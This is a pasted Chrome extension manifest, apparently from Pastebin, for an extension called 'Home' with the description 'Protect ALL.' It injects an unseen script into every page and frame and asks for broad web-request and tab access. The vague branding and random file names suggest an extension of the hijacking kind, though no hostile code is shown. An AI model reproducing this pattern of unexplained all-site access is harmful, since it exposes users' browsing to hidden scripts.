Advertisement
xcorebeta

manifest

Mar 20th, 2019
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JSON 0.83 KB | None | 0 0
  1. {
  2. "name": "Home",
  3. "externally_connectable": {
  4. "ids": ["*"],
  5. "permissions": ["contextMenus", "storage", "notifications", "webRequest", "webRequestBlocking", "tabs", "http://*/*", "https://*/*", "unlimitedStorage" ],
  6.     "accepts_tls_channel_id": true
  7. },
  8.  "homepage_url": "https://-url-",
  9.  "version": "9.3.4",
  10.  "version_name": "14",
  11.  
  12.  "description": "Protect ALL.",
  13.  "author": "604642110615609",
  14.  "manifest_version": 2,
  15.  "icons": { "16": "iconos/NXYQouDyLI.png",
  16.             "32": "iconos/NXYQouDyLI.png",
  17.             "48": "iconos/NXYQouDyLI.png",
  18.             "128": "iconos/NXYQouDyLI.png" },
  19.  "background": {
  20.    "scripts": ["eventPage.js"],
  21.    "persistant": false },
  22.  "content_scripts": [{
  23.      "matches":["*://*/*"],
  24.      "run_at":"document_end",
  25.      "all_frames": true,
  26.      "js": ["jquery-3.3.1.min.js" , "a2.js"]
  27.  }]
  28. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement